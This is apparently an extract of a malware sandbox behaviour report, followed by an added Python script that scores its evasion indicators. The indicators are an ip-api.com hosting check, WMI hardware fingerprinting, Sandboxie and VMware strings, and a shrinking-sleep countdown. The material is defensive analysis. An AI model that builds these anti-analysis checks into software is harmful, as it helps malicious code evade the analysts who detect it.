            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
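
The rows in this report are single behaviour events whose column separators and "Jump to behavior" links survive extraction badly, and the Malware Analysis System Evasion rows that follow mix strong indicators (an ip-api.com hosting lookup, Sandboxie's DLL name found in memory, WMI enumeration of the video controller and network adapters) with events that managed processes emit anyway (write-watch allocations, a TimeSpan.MaxValue wait, SEM_NOOPENFILEERRORBOX). The Python below is an added triage example; it is not part of the Joe Sandbox report and not Joe Security's tooling. It parses rows in this format, constructed here from the report's own text, and weights them with rule names and weights that are this example's own assumptions. It also treats the report's sleep figures as millisecond counts in spite of the "s" suffix, which is likewise an assumption.

```python
"""Triage of sandbox behaviour rows: parse them, then weight evasion indicators."""
import re
from collections import Counter, defaultdict

# Rows constructed from the report text (column separators lost and the
# "Jump to behavior" link residue attached, exactly as extraction leaves them).
SAMPLE_ROWS = [
    r"Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21C0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -100000s >= -30000sJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99874s >= -30000sJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99765s >= -30000sJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior",
]

EVENTS = ("HTTP traffic detected", "WMI Queries", "Binary or memory string",
          "Memory allocated", "Thread delayed", "Thread sleep time",
          "Thread sleep count", "Window / User API", "Window found",
          "Process information set")
ROW_RE = re.compile(r"^Source: (?P<source>.*?)(?P<event>" + "|".join(map(re.escape, EVENTS))
                    + r"): (?P<detail>.*?)(?:Jump to behavior)?$")
TID_RE = re.compile(r" TID: (\d+)$")
SLEEP_RE = re.compile(r"-?(\d+)s >= -(\d+)s")

# Assumption: the report's sleep figures are millisecond counts despite the "s" suffix.
SLEEP_THRESHOLD_MS = 30_000                  # the report's own ">= -30000s" threshold
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000      # 922337203685477: Int64.MaxValue ticks in ms
VM_WMI_CLASSES = {"Win32_VideoController", "Win32_NetworkAdapterConfiguration"}
SANDBOX_DLLS = {"SBIEDLL.DLL"}               # DLL Sandboxie injects into sandboxed processes

# Rule names and weights are this example's, not Joe Sandbox's.
WEIGHTS = {
    "hosting_check": 3,         # ip-api.com ?fields=hosting: "is my public IP a data centre?"
    "sandbox_dll_string": 3,    # Sandboxie DLL name carried in memory
    "vm_fingerprint_wmi": 2,    # GPU / NIC enumeration used to spot hypervisor hardware
    "sleep_countdown": 2,       # heuristic: one thread requesting steadily shrinking sleeps
    "long_sleep": 1,            # any single requested delay above the threshold
    "write_watch_alloc": 0,     # MEM_WRITE_WATCH is also how the .NET GC tracks dirty pages
    "managed_infinite_wait": 0, # TimeSpan.MaxValue waits are routine in managed hosts
    "error_box_suppressed": 0,  # SetErrorMode(SEM_NOOPENFILEERRORBOX) is ubiquitous in benign code
}


def parse_rows(lines):
    """Split each row into source process, thread id, event type and detail."""
    rows = []
    for line in lines:
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        source, tid = m["source"].strip(), None
        t = TID_RE.search(source)
        if t:
            tid, source = int(t.group(1)), source[: t.start()]
        rows.append({"source": source, "tid": tid,
                     "event": m["event"], "detail": m["detail"].strip()})
    return rows


def assess(rows):
    """Count indicator hits, detect per-thread sleep countdowns, and score."""
    hits, sleeps = Counter(), defaultdict(list)
    for r in rows:
        ev, d = r["event"], r["detail"]
        if ev == "HTTP traffic detected" and "ip-api.com" in d and "fields=hosting" in d:
            hits["hosting_check"] += 1
        elif ev == "WMI Queries":
            cls = re.search(r"Win32_\w+", d)
            if cls and cls.group(0) in VM_WMI_CLASSES:
                hits["vm_fingerprint_wmi"] += 1
        elif ev == "Binary or memory string" and d.upper() in SANDBOX_DLLS:
            hits["sandbox_dll_string"] += 1
        elif ev == "Memory allocated" and "write watch" in d:
            hits["write_watch_alloc"] += 1
        elif ev == "Thread delayed":
            ms = int(re.search(r"\d+", d).group(0))
            if ms == TIMESPAN_MAX_MS:
                hits["managed_infinite_wait"] += 1
            elif ms >= SLEEP_THRESHOLD_MS:
                hits["long_sleep"] += 1
        elif ev == "Thread sleep time" and (m := SLEEP_RE.search(d)):
            ms = int(m.group(1))               # negative = relative wait; compare magnitude
            if ms >= SLEEP_THRESHOLD_MS:
                hits["long_sleep"] += 1
            if r["tid"] is not None:
                sleeps[r["tid"]].append(ms)
        elif ev == "Process information set" and d == "NOOPENFILEERRORBOX":
            hits["error_box_suppressed"] += 1
    # Heuristic: a thread asking for 100000, 99874, 99765 ... ms looks like "sleep
    # whatever is left of a fixed budget", i.e. it re-checks how much time really passed.
    countdown = [tid for tid, s in sleeps.items()
                 if len(s) >= 3 and all(a > b for a, b in zip(s, s[1:]))]
    if countdown:
        hits["sleep_countdown"] = len(countdown)
    score = sum(WEIGHTS[k] for k, n in hits.items() if n)
    return {"indicators": dict(hits), "countdown_tids": countdown, "score": score}


if __name__ == "__main__":
    result = assess(parse_rows(SAMPLE_ROWS))
    for name, n in sorted(result["indicators"].items(), key=lambda kv: -WEIGHTS[kv[0]]):
        print(f"{name:22s} x{n:<3d} weight {WEIGHTS[name]}")
    print("countdown threads:", result["countdown_tids"], "score:", result["score"])
```

The zero-weight rules are kept on purpose: they are recorded so an analyst can see them, but a PowerShell host or any process running .NET code will produce write-watch reservations, TimeSpan.MaxValue waits and SEM_NOOPENFILEERRORBOX on its own, so they should not move a verdict. The hosting lookup, the Sandboxie DLL name and the WMI hardware enumeration carry the weight, and the shrinking-sleep pattern from one thread is worth a second look even where each individual sleep is short.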

            Malware Analysis System Evasion

            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21C0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22070000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21EE0000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5090
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4724
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7672
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2194
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5920
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3884
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104 Thread sleep count: 7672 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep count: 2194 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6304 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -31359464925306218s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -100000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4216 Thread sleep count: 5920 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99874s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4216 Thread sleep count: 3884 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99765s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99655s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99546s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99437s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99312s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99202s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -99088s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98966s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98859s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98749s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98637s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98530s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98421s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98311s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98203s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -98093s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97983s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97874s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97765s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97656s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97546s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97437s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97327s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97218s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -97090s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96981s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96869s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96746s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96638s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96508s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96396s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -96276s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95958s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95828s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95691s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95359s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95228s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -95078s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -94937s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -94132s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93975s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93808s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93683s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93577s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93465s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93358s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140 Thread sleep time: -93249s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93132s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93028s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92917s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92812s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92702s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92593s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92482s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92374s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92156s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -91964s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99874
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99765
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99655
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99546
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99437
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99312
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99202
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99088
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98966
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98859
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98749
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98637
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98530
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98421
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98311
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98203
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98093
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97983
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97874
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97765
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97656
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97546
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97437
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97327
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97218
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97090
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96981
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96869
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96746
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96638
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96508
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96396
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96276
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95958
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95828
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95691
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95359
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95228
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95078
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94937
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94132
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93975
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93808
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93683
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93577
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93465
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93358
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93249
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93132
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 93028
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92917
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92812
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92702
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92593
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92482
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92374
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92265
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 92156
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 91964
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
